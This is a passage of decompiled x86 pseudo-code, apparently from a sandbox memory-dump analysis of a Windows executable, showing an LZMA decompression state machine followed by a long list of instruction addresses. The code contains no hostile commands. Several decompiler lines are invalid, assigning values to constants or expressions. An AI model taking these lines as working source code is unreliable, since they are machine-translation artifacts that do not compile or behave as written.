                                                          														__ebx = _t170;
                                                          														__cx = __ax >> 5;
                                                          														__eflags = __eax;
                                                          														 *__esi = __ax;
                                                          													} else {
                                                          														 *(__ebp - 0x10) = __ecx;
                                                          														0x800 = 0x800 - __edi;
                                                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          														__ebx = __ebx + __ebx;
                                                          														 *__esi = __cx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														continue;
                                                          													} else {
                                                          														goto L46;
                                                          													}
                                                          												}
                                                          												L54:
                                                          												_t173 = __ebp - 0x34;
                                                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          												__eflags =  *_t173;
                                                          												goto L55;
                                                          											case 0xf:
                                                          												L58:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xf;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t203 = __ebp - 0x70;
                                                          												 *_t203 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t203;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L60:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													L55:
                                                          													__al =  *(__ebp - 0x44);
                                                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          													goto L56;
                                                          												}
                                                          												L61:
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t217 = __edx + 1; // 0x1
                                                          													__ebx = _t217;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L60;
                                                          												} else {
                                                          													goto L58;
                                                          												}
                                                          											case 0x10:
                                                          												L109:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0x10;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t365 = __ebp - 0x70;
                                                          												 *_t365 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t365;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												goto L111;
                                                          											case 0x11:
                                                          												L68:
                                                          												_t614 =  *(_t621 - 0x58);
                                                          												 *(_t621 - 0x84) = 0x12;
                                                          												while(1) {
                                                          													L132:
                                                          													 *(_t621 - 0x54) = _t614;
                                                          													goto L133;
                                                          												}
                                                          											case 0x12:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 0x58);
                                                          													 *(__ebp - 0x84) = 0x13;
                                                          													__esi =  *(__ebp - 0x58) + 2;
                                                          													while(1) {
                                                          														L132:
                                                          														 *(_t621 - 0x54) = _t614;
                                                          														goto L133;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x4c);
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                          												__eflags = __eax;
                                                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          												goto L130;
                                                          											case 0x13:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													_t469 = __ebp - 0x58;
                                                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          													__eflags =  *_t469;
                                                          													 *(__ebp - 0x30) = 0x10;
                                                          													 *(__ebp - 0x40) = 8;
                                                          													L144:
                                                          													 *(__ebp - 0x7c) = 0x14;
                                                          													goto L145;
                                                          												}
                                                          												__eax =  *(__ebp - 0x4c);
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                          												 *(__ebp - 0x30) = 8;
                                                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          												L130:
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												 *(__ebp - 0x40) = 3;
                                                          												goto L144;
                                                          											case 0x14:
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          												__eax =  *(__ebp - 0x80);
                                                          												 *(_t621 - 0x88) = _t542;
                                                          												goto L1;
                                                          											case 0x15:
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xb;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          												goto L120;
                                                          											case 0x16:
                                                          												__eax =  *(__ebp - 0x30);
                                                          												__eflags = __eax - 4;
                                                          												if(__eax >= 4) {
                                                          													_push(3);
                                                          													_pop(__eax);
                                                          												}
                                                          												__ecx =  *(__ebp - 4);
                                                          												 *(__ebp - 0x40) = 6;
                                                          												__eax = __eax << 7;
                                                          												 *(__ebp - 0x7c) = 0x19;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L145;
                                                          											case 0x17:
                                                          												L145:
                                                          												__eax =  *(__ebp - 0x40);
                                                          												 *(__ebp - 0x50) = 1;
                                                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          												goto L149;
                                                          											case 0x18:
                                                          												L146:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0x18;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t484 = __ebp - 0x70;
                                                          												 *_t484 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t484;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L148:
                                                          												_t487 = __ebp - 0x48;
                                                          												 *_t487 =  *(__ebp - 0x48) - 1;
                                                          												__eflags =  *_t487;
                                                          												L149:
                                                          												__eflags =  *(__ebp - 0x48);
                                                          												if( *(__ebp - 0x48) <= 0) {
                                                          													__ecx =  *(__ebp - 0x40);
                                                          													__ebx =  *(__ebp - 0x50);
                                                          													0 = 1;
                                                          													__eax = 1 << __cl;
                                                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          													__eax =  *(__ebp - 0x7c);
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													while(1) {
                                                          														 *(_t621 - 0x88) = _t542;
                                                          														goto L1;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x50);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__esi = __edx + __eax;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__ax =  *__esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													__cx = __ax >> 5;
                                                          													__eax = __eax - __ecx;
                                                          													__edx = __edx + 1;
                                                          													__eflags = __edx;
                                                          													 *__esi = __ax;
                                                          													 *(__ebp - 0x50) = __edx;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L148;
                                                          												} else {
                                                          													goto L146;
                                                          												}
                                                          											case 0x19:
                                                          												__eflags = __ebx - 4;
                                                          												if(__ebx < 4) {
                                                          													 *(__ebp - 0x2c) = __ebx;
                                                          													L119:
                                                          													_t393 = __ebp - 0x2c;
                                                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          													__eflags =  *_t393;
                                                          													L120:
                                                          													__eax =  *(__ebp - 0x2c);
                                                          													__eflags = __eax;
                                                          													if(__eax == 0) {
                                                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          														goto L170;
                                                          													}
                                                          													__eflags = __eax -  *(__ebp - 0x60);
                                                          													if(__eax >  *(__ebp - 0x60)) {
                                                          														goto L171;
                                                          													}
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          													__eax =  *(__ebp - 0x30);
                                                          													_t400 = __ebp - 0x60;
                                                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          													__eflags =  *_t400;
                                                          													goto L123;
                                                          												}
                                                          												__ecx = __ebx;
                                                          												__eax = __ebx;
                                                          												__ecx = __ebx >> 1;
                                                          												__eax = __ebx & 0x00000001;
                                                          												__ecx = (__ebx >> 1) - 1;
                                                          												__al = __al | 0x00000002;
                                                          												__eax = (__ebx & 0x00000001) << __cl;
                                                          												__eflags = __ebx - 0xe;
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												if(__ebx >= 0xe) {
                                                          													__ebx = 0;
                                                          													 *(__ebp - 0x48) = __ecx;
                                                          													L102:
                                                          													__eflags =  *(__ebp - 0x48);
                                                          													if( *(__ebp - 0x48) <= 0) {
                                                          														__eax = __eax + __ebx;
                                                          														 *(__ebp - 0x40) = 4;
                                                          														 *(__ebp - 0x2c) = __eax;
                                                          														__eax =  *(__ebp - 4);
                                                          														__eax =  *(__ebp - 4) + 0x644;
                                                          														__eflags = __eax;
                                                          														L108:
                                                          														__ebx = 0;
                                                          														 *(__ebp - 0x58) = __eax;
                                                          														 *(__ebp - 0x50) = 1;
                                                          														 *(__ebp - 0x44) = 0;
                                                          														 *(__ebp - 0x48) = 0;
                                                          														L112:
                                                          														__eax =  *(__ebp - 0x40);
                                                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          															_t391 = __ebp - 0x2c;
                                                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          															__eflags =  *_t391;
                                                          															goto L119;
                                                          														}
                                                          														__eax =  *(__ebp - 0x50);
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          														__eax =  *(__ebp - 0x58);
                                                          														__esi = __edi + __eax;
                                                          														 *(__ebp - 0x54) = __esi;
                                                          														__ax =  *__esi;
                                                          														__ecx = __ax & 0x0000ffff;
                                                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          														__eflags =  *(__ebp - 0xc) - __edx;
                                                          														if( *(__ebp - 0xc) >= __edx) {
                                                          															__ecx = 0;
                                                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          															__ecx = 1;
                                                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          															__ebx = 1;
                                                          															__ecx =  *(__ebp - 0x48);
                                                          															__ebx = 1 << __cl;
                                                          															__ecx = 1 << __cl;
                                                          															__ebx =  *(__ebp - 0x44);
                                                          															__ebx =  *(__ebp - 0x44) | __ecx;
                                                          															__cx = __ax;
                                                          															__cx = __ax >> 5;
                                                          															__eax = __eax - __ecx;
                                                          															__edi = __edi + 1;
                                                          															__eflags = __edi;
                                                          															 *(__ebp - 0x44) = __ebx;
                                                          															 *__esi = __ax;
                                                          															 *(__ebp - 0x50) = __edi;
                                                          														} else {
                                                          															 *(__ebp - 0x10) = __edx;
                                                          															0x800 = 0x800 - __ecx;
                                                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          															 *__esi = __dx;
                                                          														}
                                                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          														if( *(__ebp - 0x10) >= 0x1000000) {
                                                          															L111:
                                                          															_t368 = __ebp - 0x48;
                                                          															 *_t368 =  *(__ebp - 0x48) + 1;
                                                          															__eflags =  *_t368;
                                                          															goto L112;
                                                          														} else {
                                                          															goto L109;
                                                          														}
                                                          													}
                                                          													__ecx =  *(__ebp - 0xc);
                                                          													__ebx = __ebx + __ebx;
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          														__ecx =  *(__ebp - 0x10);
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          														__ebx = __ebx | 0x00000001;
                                                          														__eflags = __ebx;
                                                          														 *(__ebp - 0x44) = __ebx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														L101:
                                                          														_t338 = __ebp - 0x48;
                                                          														 *_t338 =  *(__ebp - 0x48) - 1;
                                                          														__eflags =  *_t338;
                                                          														goto L102;
                                                          													} else {
                                                          														goto L99;
                                                          													}
                                                          												}
                                                          												__edx =  *(__ebp - 4);
                                                          												__eax = __eax - __ebx;
                                                          												 *(__ebp - 0x40) = __ecx;
                                                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          												goto L108;
                                                          											case 0x1a:
                                                          												L56:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													 *(__ebp - 0x88) = 0x1a;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x68);
                                                          												__al =  *(__ebp - 0x5c);
                                                          												__edx =  *(__ebp - 8);
                                                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          												 *( *(__ebp - 0x68)) = __al;
                                                          												__ecx =  *(__ebp - 0x14);
                                                          												 *(__ecx +  *(__ebp - 8)) = __al;
                                                          												__eax = __ecx + 1;
                                                          												__edx = 0;
                                                          												_t192 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t192;
                                                          												goto L79;
                                                          											case 0x1b:
                                                          												L75:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													 *(__ebp - 0x88) = 0x1b;
                                                          													goto L170;
                                                          												}
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__edx =  *(__ebp - 8);
                                                          												__cl =  *(__eax + __edx);
                                                          												__eax =  *(__ebp - 0x14);
                                                          												 *(__ebp - 0x5c) = __cl;
                                                          												 *(__eax + __edx) = __cl;
                                                          												__eax = __eax + 1;
                                                          												__edx = 0;
                                                          												_t274 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t274;
                                                          												__eax =  *(__ebp - 0x68);
                                                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												_t283 = __ebp - 0x64;
                                                          												 *_t283 =  *(__ebp - 0x64) - 1;
                                                          												__eflags =  *_t283;
                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                          												L79:
                                                          												 *(__ebp - 0x14) = __edx;
                                                          												goto L80;
                                                          											case 0x1c:
                                                          												while(1) {
                                                          													L123:
                                                          													__eflags =  *(__ebp - 0x64);
                                                          													if( *(__ebp - 0x64) == 0) {
                                                          														break;
                                                          													}
                                                          													__eax =  *(__ebp - 0x14);
                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                          														__eflags = __eax;
                                                          													}
                                                          													__edx =  *(__ebp - 8);
                                                          													__cl =  *(__eax + __edx);
                                                          													__eax =  *(__ebp - 0x14);
                                                          													 *(__ebp - 0x5c) = __cl;
                                                          													 *(__eax + __edx) = __cl;
                                                          													__eax = __eax + 1;
                                                          													__edx = 0;
                                                          													_t414 = __eax %  *(__ebp - 0x74);
                                                          													__eax = __eax /  *(__ebp - 0x74);
                                                          													__edx = _t414;
                                                          													__eax =  *(__ebp - 0x68);
                                                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          													__eflags =  *(__ebp - 0x30);
                                                          													 *( *(__ebp - 0x68)) = __cl;
                                                          													 *(__ebp - 0x14) = _t414;
                                                          													if( *(__ebp - 0x30) > 0) {
                                                          														continue;
                                                          													} else {
                                                          														L80:
                                                          														 *(__ebp - 0x88) = 2;
                                                          														goto L1;
                                                          													}
                                                          												}
                                                          												 *(__ebp - 0x88) = 0x1c;
                                                          												goto L170;
                                                          										}
                                                          									}
                                                          									L171:
                                                          									_t544 = _t543 | 0xffffffff;
                                                          									goto L172;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					goto L1;
                                                          				}
                                                          			}














                                                          0x004061c7
                                                          0x004061ca
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d5
                                                          0x004061d5
                                                          0x004061d9
                                                          0x00406899
                                                          0x00000000
                                                          0x00406899
                                                          0x004061df
                                                          0x004061e2
                                                          0x004061e5
                                                          0x004061e9
                                                          0x004061ec
                                                          0x004061f2
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f7
                                                          0x004061fa
                                                          0x004061fa
                                                          0x004061fa
                                                          0x00406200
                                                          0x00000000
                                                          0x00000000
                                                          0x00406202
                                                          0x00406205
                                                          0x00406208
                                                          0x0040620b
                                                          0x0040620e
                                                          0x00406211
                                                          0x00406214
                                                          0x00406217
                                                          0x0040621a
                                                          0x0040621d
                                                          0x00406220
                                                          0x00406238
                                                          0x0040623b
                                                          0x0040623e
                                                          0x00406241
                                                          0x00406241
                                                          0x00406244
                                                          0x00406248
                                                          0x0040624a
                                                          0x00406222
                                                          0x00406222
                                                          0x0040622a
                                                          0x0040622f
                                                          0x00406231
                                                          0x00406233
                                                          0x00406233
                                                          0x0040624d
                                                          0x00406254
                                                          0x00406257
                                                          0x00000000
                                                          0x00406259
                                                          0x00000000
                                                          0x00406259
                                                          0x00406257
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406299
                                                          0x00406299
                                                          0x0040629d
                                                          0x004068a5
                                                          0x00000000
                                                          0x004068a5
                                                          0x004062a3
                                                          0x004062a6
                                                          0x004062a9
                                                          0x004062ad
                                                          0x004062b0
                                                          0x004062b6
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062bb
                                                          0x004062be
                                                          0x004062be
                                                          0x004062c4
                                                          0x00406262
                                                          0x00406262
                                                          0x00406265
                                                          0x00000000
                                                          0x00406265
                                                          0x004062c6
                                                          0x004062c6
                                                          0x004062c9
                                                          0x004062cc
                                                          0x004062cf
                                                          0x004062d2
                                                          0x004062d5
                                                          0x004062d8
                                                          0x004062db
                                                          0x004062de
                                                          0x004062e1
                                                          0x004062e4
                                                          0x004062fc
                                                          0x004062ff
                                                          0x00406302
                                                          0x00406305
                                                          0x00406305
                                                          0x00406308
                                                          0x0040630c
                                                          0x0040630e
                                                          0x004062e6
                                                          0x004062e6
                                                          0x004062ee
                                                          0x004062f3
                                                          0x004062f5
                                                          0x004062f7
                                                          0x004062f7
                                                          0x00406311
                                                          0x00406318
                                                          0x0040631b
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x004065aa
                                                          0x004065aa
                                                          0x004065ae
                                                          0x004068d5
                                                          0x00000000
                                                          0x004068d5
                                                          0x004065b4
                                                          0x004065b7
                                                          0x004065ba
                                                          0x004065be
                                                          0x004065c1
                                                          0x004065c7
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040637a
                                                          0x0040637a
                                                          0x0040637d
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066b9
                                                          0x004066bd
                                                          0x004066df
                                                          0x004066e2
                                                          0x004066ec
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066bf
                                                          0x004066c2
                                                          0x004066c6
                                                          0x004066c9
                                                          0x004066c9
                                                          0x004066cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406776
                                                          0x0040677a
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x0040679f
                                                          0x004067a6
                                                          0x004067ad
                                                          0x004067ad
                                                          0x00000000
                                                          0x004067ad
                                                          0x0040677c
                                                          0x0040677f
                                                          0x00406782
                                                          0x00406785
                                                          0x0040678c
                                                          0x004066d0
                                                          0x004066d0
                                                          0x004066d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406867
                                                          0x0040686a
                                                          0x0040676b
                                                          0x00000000
                                                          0x00000000
                                                          0x004064a1
                                                          0x004064a3
                                                          0x004064aa
                                                          0x004064ab
                                                          0x004064ad
                                                          0x004064b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004064b8
                                                          0x004064bb
                                                          0x004064be
                                                          0x004064c0
                                                          0x004064c2
                                                          0x004064c2
                                                          0x004064c3
                                                          0x004064c6
                                                          0x004064cd
                                                          0x004064d0
                                                          0x004064de
                                                          0x00000000
                                                          0x00000000
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x00000000
                                                          0x00000000
                                                          0x004067c3
                                                          0x004067c3
                                                          0x004067c7
                                                          0x004068ff
                                                          0x00000000
                                                          0x004068ff
                                                          0x004067cd
                                                          0x004067d0
                                                          0x004067d3
                                                          0x004067d7
                                                          0x004067da
                                                          0x004067e0
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e5
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067eb
                                                          0x004067eb
                                                          0x004067ef
                                                          0x0040684f
                                                          0x00406852
                                                          0x00406857
                                                          0x00406858
                                                          0x0040685a
                                                          0x0040685c
                                                          0x0040685f
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00000000
                                                          0x00406771
                                                          0x0040676b
                                                          0x004067f1
                                                          0x004067f7
                                                          0x004067fa
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406806
                                                          0x00406809
                                                          0x0040680c
                                                          0x0040680f
                                                          0x00406812
                                                          0x0040682b
                                                          0x0040682e
                                                          0x00406831
                                                          0x00406834
                                                          0x00406838
                                                          0x0040683a
                                                          0x0040683a
                                                          0x0040683b
                                                          0x0040683e
                                                          0x00406814
                                                          0x00406814
                                                          0x0040681c
                                                          0x00406821
                                                          0x00406823
                                                          0x00406826
                                                          0x00406826
                                                          0x00406841
                                                          0x00406848
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x004064e6
                                                          0x004064e9
                                                          0x0040651f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x00406652
                                                          0x00406652
                                                          0x00406655
                                                          0x00406657
                                                          0x004068e1
                                                          0x00000000
                                                          0x004068e1
                                                          0x0040665d
                                                          0x00406660
                                                          0x00000000
                                                          0x00000000
                                                          0x00406666
                                                          0x0040666a
                                                          0x0040666d
                                                          0x0040666d
                                                          0x0040666d
                                                          0x00000000
                                                          0x0040666d
                                                          0x004064eb
                                                          0x004064ed
                                                          0x004064ef
                                                          0x004064f1
                                                          0x004064f4
                                                          0x004064f5
                                                          0x004064f7
                                                          0x004064f9
                                                          0x004064fc
                                                          0x004064ff
                                                          0x00406515
                                                          0x0040651a
                                                          0x00406552
                                                          0x00406552
                                                          0x00406556
                                                          0x00406582
                                                          0x00406584
                                                          0x0040658b
                                                          0x0040658e
                                                          0x00406591
                                                          0x00406591
                                                          0x00406596
                                                          0x00406596
                                                          0x00406598
                                                          0x0040659b
                                                          0x004065a2
                                                          0x004065a5
                                                          0x004065d2
                                                          0x004065d2
                                                          0x004065d5
                                                          0x004065d8
                                                          0x0040664c
                                                          0x0040664c
                                                          0x0040664c
                                                          0x00000000
                                                          0x0040664c
                                                          0x004065da
                                                          0x004065e0
                                                          0x004065e3
                                                          0x004065e6
                                                          0x004065e9
                                                          0x004065ec
                                                          0x004065ef
                                                          0x004065f2
                                                          0x004065f5
                                                          0x004065f8
                                                          0x004065fb
                                                          0x00406614
                                                          0x00406616
                                                          0x00406619
                                                          0x0040661a
                                                          0x0040661d
                                                          0x0040661f
                                                          0x00406622
                                                          0x00406624
                                                          0x00406626
                                                          0x00406629
                                                          0x0040662b
                                                          0x0040662e
                                                          0x00406632
                                                          0x00406634
                                                          0x00406634
                                                          0x00406635
                                                          0x00406638
                                                          0x0040663b
                                                          0x004065fd
                                                          0x004065fd
                                                          0x00406605
                                                          0x0040660a
                                                          0x0040660c
                                                          0x0040660f
                                                          0x0040660f
                                                          0x0040663e
                                                          0x00406645
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x00000000
                                                          0x00406647
                                                          0x00000000
                                                          0x00406647
                                                          0x00406645
                                                          0x00406558
                                                          0x0040655b

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
